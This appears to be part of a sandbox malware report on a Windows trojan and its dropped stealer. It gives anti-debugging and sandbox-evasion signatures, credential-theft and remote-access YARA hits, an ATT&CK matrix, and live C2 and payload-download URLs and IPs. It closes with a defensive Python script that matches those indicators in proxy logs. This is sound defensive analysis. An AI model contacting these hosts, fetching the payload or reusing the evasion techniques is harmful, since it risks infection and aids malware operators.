                  Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26360
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26363
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26374
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26382
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26248
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26403
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-27788
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeAPI call chain: ExitProcess graph end nodegraph_2-26202
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3F3
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_004045C0 VirtualProtect ?,00000004,00000100,000000002_2_004045C0
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC7E
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0042FE7F mov eax, dword ptr fs:[00000030h]0_2_0042FE7F
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_008697B3 push dword ptr fs:[00000030h]0_2_008697B3
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A800E6 mov eax, dword ptr fs:[00000030h]0_2_00A800E6
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A5092B mov eax, dword ptr fs:[00000030h]0_2_00A5092B
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A50D90 mov eax, dword ptr fs:[00000030h]0_2_00A50D90
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00419750 mov eax, dword ptr fs:[00000030h]2_2_00419750
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00849AFB push dword ptr fs:[00000030h]2_2_00849AFB
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022D092B mov eax, dword ptr fs:[00000030h]2_2_022D092B
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E99B7 mov eax, dword ptr fs:[00000030h]2_2_022E99B7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022D0D90 mov eax, dword ptr fs:[00000030h]2_2_022D0D90
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0043BBE1 GetProcessHeap,0_2_0043BBE1
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3F3
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004104F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104F3
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00410686 SetUnhandledExceptionFilter,0_2_00410686
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0040F936 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F936
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A7A65A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A7A65A
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A6075A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A6075A
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A608ED SetUnhandledExceptionFilter,0_2_00A608ED
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A5FB9D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00A5FB9D
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041AD48
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0041CEEA SetUnhandledExceptionFilter,2_2_0041CEEA
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041B33A
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022EAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_022EAFAF
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022ED151 SetUnhandledExceptionFilter,2_2_022ED151
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022EB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_022EB5A1
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe Memory protected: page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara matchFile source: Process Memory Space: A865.tmp.exe PID: 3640, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_00419600
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_022E9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_022E9867
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe Process created: C:\Users\user\AppData\Local\Temp\A865.tmp.exe "C:\Users\user\AppData\Local\Temp\A865.tmp.exe"
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0041079B cpuid 0_2_0041079B
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B02A
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_004351E0
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_0043B2ED
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_0043B2A2
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_0043B388
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B415
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_0043B665
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B78E
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_0043B895
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B962
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_00434DED
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_00A85054
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00A8B291
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_00A85447
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_00A8B5EF
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_00A8B509
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: EnumSystemLocalesW,0_2_00A8B554
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_00A8B8CC
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_00A8B8C2
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00A8B9F5
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetLocaleInfoW,0_2_00A8BAFC
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00A8BBC9
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00417B90
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_022E7DF7
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004103ED GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103ED
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_00417850
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exeCode function: 2_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00417A30
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_0041640A GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_0041640A
                  Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 2.2.A865.tmp.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.A865.tmp.exe.22d0e67.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.A865.tmp.exe.22d0e67.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.A865.tmp.exe.2320000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.A865.tmp.exe.2320000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.A865.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2224459772.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: A865.tmp.exe PID: 3640, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP

                  Remote Access Functionality

                  Source: Yara matchFile source: 2.2.A865.tmp.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.A865.tmp.exe.22d0e67.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.A865.tmp.exe.22d0e67.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.A865.tmp.exe.2320000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.3.A865.tmp.exe.2320000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.A865.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2224459772.0000000002320000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: A865.tmp.exe PID: 3640, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_004218EC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218EC
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00420C16 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420C16
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A71B53 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_00A71B53
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exeCode function: 0_2_00A70E7D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00A70E7D
                  MITRE ATT&CK Matrix (one row per line; columns separated by " | "; a number before a technique name is the signature count shown in that cell)

                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 13 Native API | 1 DLL Side-Loading | 111 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Virtualization/Sandbox Evasion | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | 3 Clipboard Data | 12 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 31 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 11 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 11 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 22 Software Packing | DCSync | 1 Account Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 1 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 2 File and Directory Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 134 System Information Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source            Detection   Scanner          Label
GK059kPZ5B.exe    50%         ReversingLabs    Win32.Trojan.Generic
GK059kPZ5B.exe    100%        Joe Sandbox ML

Dropped Files
Source                                                                                         Detection   Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe    100%        Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\A865.tmp.exe                                                  100%        Joe Sandbox ML

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source               Detection   Scanner           Label
http://upx.sf.net    0%          URL Reputation    safe
Contacted Domains
Name              IP                Active   Malicious   Antivirus Detection   Reputation
post-to-me.com    172.67.179.207    true     false                             unknown

Contacted URLs
Name                                                Malicious   Antivirus Detection   Reputation
http://62.204.41.177/edd20096ecef326d.php           true                              unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DE    false                             unknown
http://62.204.41.177/                               true                              unknown
URLs from Memory and Binaries
(Name; Source; Malicious; Antivirus Detection; Reputation. Trailing characters such as "phpN" or "exe)a" are part of the carved memory strings as reported.)

https://post-to-me.com/track_prt.php?sub=&cc=DE
  Source: GK059kPZ5B.exe, 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp
  Malicious: false   Reputation: unknown
http://62.204.41.177/edd20096ecef326d.phpN
  Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: unknown
https://post-to-me.com/track_prt.php?sub=
  Source: GK059kPZ5B.exe
  Malicious: false   Reputation: unknown
http://176.113.115.37/ScreenUpdateSync.exeDT
  Source: GK059kPZ5B.exe, 00000000.00000003.4442572205.000000000090F000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555505002.0000000000911000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: unknown
http://62.204.41.177/6
  Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: unknown
http://176.113.115.37/ScreenUpdateSync.exe)a
  Source: GK059kPZ5B.exe, 00000000.00000003.4442572205.000000000090F000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555505002.0000000000911000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: unknown
http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE
  Source: GK059kPZ5B.exe, 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp
  Malicious: false   Reputation: unknown
https://post-to-me.com/
  Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: unknown
http://upx.sf.net
  Source: Amcache.hve.5.dr
  Malicious: false   Antivirus Detection: URL Reputation: safe   Reputation: unknown
http://62.204.41.177i
  Source: A865.tmp.exe, 00000002.00000002.3069309026.000000000083E000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: unknown
http://62.204.41.177/edd20096ecef326d.phpZ
  Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: unknown
http://62.204.41.177/edd20096ecef326d.php$
  Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: unknown
http://176.113.115.37/ScreenUpdateSync.exe
  Source: GK059kPZ5B.exe, GK059kPZ5B.exe, 00000000.00000003.4442572205.000000000090F000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555505002.0000000000911000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: unknown
http://62.204.41.177/edd20096ecef326d.phpf
  Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DEe
  Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: unknown
https://post-to-me.com/=
  Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false   Reputation: unknown
http://62.204.41.177
  Source: A865.tmp.exe, 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, A865.tmp.exe, 00000002.00000002.3069309026.000000000083E000.00000004.00000020.00020000.00000000.sdmp
  Malicious: true   Reputation: unknown
Contacted IPs (Public)
IP                Domain            Country               ASN      ASN Name                               Malicious
176.113.115.37    unknown           Russian Federation    49505    SELECTEL, RU                           false
62.204.41.177     unknown           United Kingdom        30798    TNNET-AS TNNet Oy Main network, FI     true
172.67.179.207    post-to-me.com    United States         13335    CLOUDFLARENET, US                      false
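The URL tables above list the same C2 and payload locations several times with trailing junk ("phpN", "exe)a", "177i") because the strings were carved from process memory, and the Cloudflare-fronted post-to-me.com is contacted but not marked malicious. The following example is added for this page (it is not Joe Sandbox code): it normalises those raw strings into host/path indicators and runs them over constructed Squid-style proxy log lines. The log lines, the split into MALICIOUS_HOSTS and SUSPICIOUS_HOSTS, and the rule that only .php/.exe paths are real are assumptions made here.

```python
import re
from urllib.parse import urlsplit

# URL strings copied from the report's "URLs from memory and binaries" and
# "Contacted URLs" tables. Memory-carved strings carry trailing junk bytes
# (".phpN", ".exe)a", "/6", "177i"), so they are normalised before use.
RAW_REPORT_URLS = [
    "http://62.204.41.177/edd20096ecef326d.php",
    "http://62.204.41.177/edd20096ecef326d.phpN",
    "http://62.204.41.177/edd20096ecef326d.phpZ",
    "http://62.204.41.177/edd20096ecef326d.php$",
    "http://62.204.41.177/6",
    "http://62.204.41.177i",
    "http://62.204.41.177/",
    "http://176.113.115.37/ScreenUpdateSync.exe",
    "http://176.113.115.37/ScreenUpdateSync.exeDT",
    "http://176.113.115.37/ScreenUpdateSync.exe)a",
    "http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE",
    "https://post-to-me.com/track_prt.php?sub=0&cc=DE",
    "https://post-to-me.com/",
]

# Verdicts taken from the report: C2 and payload hosts are marked malicious;
# post-to-me.com is contacted but marked non-malicious, so it is surfaced as
# suspicious rather than blocked. (Split chosen here, not stated by the report.)
MALICIOUS_HOSTS = {"62.204.41.177", "176.113.115.37"}
SUSPICIOUS_HOSTS = {"post-to-me.com"}

_IP_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})")
# Assumption: only .php / .exe paths occur in this report; what follows is junk.
_PATH_RE = re.compile(r"^(/[A-Za-z0-9_./-]*?\.(?:php|exe))")


def normalise_url(url):
    """Return (host, path): host lower-cased and port-free, path cut at the
    first .php/.exe, or None for a bare host or unrecognised path."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    m = _IP_RE.match(host)
    if m:                       # "62.204.41.177i" -> "62.204.41.177"
        host = m.group(1)
    m = _PATH_RE.match(parts.path)
    return host, (m.group(1) if m else None)


def build_indicators(raw_urls):
    """Map host -> set of cleaned paths (None means a host-level indicator)."""
    indicators = {}
    for url in raw_urls:
        host, path = normalise_url(url)
        if host:
            indicators.setdefault(host, set()).add(path)
    return indicators


_URL_IN_LOG = re.compile(r"https?://\S+")


def classify_log_line(line, indicators):
    """Return (verdict, host, known_path) for one proxy log line.
    verdict is 'malicious', 'suspicious' or None (no indicator host)."""
    m = _URL_IN_LOG.search(line)
    if not m:
        return None, None, False
    host, path = normalise_url(m.group(0))
    if host not in indicators:
        return None, host, False
    verdict = "malicious" if host in MALICIOUS_HOSTS else "suspicious"
    return verdict, host, path in indicators[host]


def scan(lines, indicators):
    """Return [(line_no, verdict, host, known_path)] for every hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict, host, known = classify_log_line(line, indicators)
        if verdict:
            hits.append((n, verdict, host, known))
    return hits


# Constructed Squid-style access log lines (not taken from the report).
SAMPLE_LOG = [
    "1729962500.101 WS1 10.0.0.5 TCP_MISS/200 512 POST http://62.204.41.177/edd20096ecef326d.php - HIER_DIRECT/62.204.41.177 text/html",
    "1729962501.225 WS1 10.0.0.5 TCP_MISS/200 401200 GET http://176.113.115.37/ScreenUpdateSync.exe - HIER_DIRECT/176.113.115.37 application/octet-stream",
    "1729962502.300 WS1 10.0.0.5 TCP_TUNNEL/200 88 GET https://post-to-me.com:443/track_prt.php?sub=0&cc=DE - HIER_DIRECT/172.67.179.207 text/html",
    "1729962503.000 WS2 10.0.0.7 TCP_MISS/200 1200 GET http://upx.sf.net/ - HIER_DIRECT/203.0.113.10 text/html",
    "1729962504.000 WS2 10.0.0.7 TCP_MISS/404 300 GET http://62.204.41.177/other.php - HIER_DIRECT/62.204.41.177 text/html",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, build_indicators(RAW_REPORT_URLS)):
        print(hit)
```

The host-level match matters: the report marks the bare http://62.204.41.177 as malicious, so a request to an unseen path on that host (line 5 of the sample log) is still flagged, with known_path=False telling the analyst it is a new path worth pulling into the case.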
General Information
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1542871
Start date and time: 2024-10-26 19:07:29 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: GK059kPZ5B.exe (renamed because the original name is a hash value)
Original Sample Name: 9883fdabd29a18139bd1cadedf550f35.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@4/7@1/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 50
• Number of non-executed functions: 378
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.21
